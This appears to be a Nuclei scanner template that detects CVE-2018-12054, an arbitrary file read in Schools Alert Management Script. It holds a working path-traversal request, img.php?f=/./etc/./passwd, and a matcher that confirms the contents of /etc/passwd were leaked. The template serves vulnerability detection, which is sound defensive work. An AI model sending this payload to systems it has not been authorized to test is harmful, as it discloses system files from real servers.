43 lines
1.5 KiB
YAML
43 lines
1.5 KiB
YAML
id: CVE-2018-12054
|
|
|
|
info:
|
|
name: Schools Alert Management Script - Arbitrary File Read
|
|
author: wisnupramoedya
|
|
severity: high
|
|
description: Schools Alert Management Script is susceptible to an arbitrary file read vulnerability via the f parameter in img.php, aka absolute path traversal.
|
|
remediation: |
|
|
Apply the latest patch or update provided by the vendor to fix the arbitrary file read vulnerability in the Schools Alert Management Script.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/44874
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-12054
|
|
- https://github.com/unh3x/just4cve/issues/4
|
|
- https://www.exploit-db.com/exploits/44874/
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2018-12054
|
|
cwe-id: CWE-22
|
|
epss-score: 0.36029
|
|
epss-percentile: 0.96734
|
|
cpe: cpe:2.3:a:schools_alert_management_script_project:schools_alert_management_script:-:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: schools_alert_management_script_project
|
|
product: schools_alert_management_script
|
|
tags: cve,cve2018,lfi,edb
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/img.php?f=/./etc/./passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a0048304602210099adade6563f573acc9cb4461025f05aa58780cfc24480974d46bad15fbeb5b7022100d784e879bdcc9fba2fb398e4a3ef1abc0d88e6462db3cfbdad2341056e3bdc0a:922c64590222798bb761d5b6d8e72950 |